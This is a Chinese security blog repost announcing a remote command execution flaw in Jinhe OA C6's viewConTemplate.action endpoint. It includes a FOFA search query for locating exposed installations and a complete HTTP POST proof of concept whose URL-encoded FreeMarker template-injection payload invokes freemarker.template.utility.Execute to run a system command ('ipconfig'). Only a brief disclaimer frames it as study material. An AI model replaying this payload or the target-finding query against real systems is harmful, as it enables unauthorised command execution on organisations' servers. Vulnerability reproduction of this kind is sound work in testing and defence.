金和OA viewConTemplate.action存在远程命令执行漏洞 附POC软件

admin 2024年3月14日18:48:38金和OA viewConTemplate.action存在远程命令执行漏洞 附POC软件已关闭评论55 views字数 1096阅读3分39秒阅读模式

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 金和OA 简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。

2.漏洞描述

金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA viewConTemplate.action存在远程命令执行漏洞

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

金和OA协同办公管理系统C6

图片
金和OA viewConTemplate.action存在远程命令执行漏洞

4.fofa查询语句

app="金和网络-金和OA"||body="/jc6/platform/sys/login"

5.漏洞复现

漏洞链接:http://127.0.0.1/jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action

漏洞数据包:

POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 152
Content-Type: application/x-www-form-urlencoded

moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1

图片

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月14日18:48:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金和OA viewConTemplate.action存在远程命令执行漏洞 附POC软件http://cn-sec.com/archives/2573126.html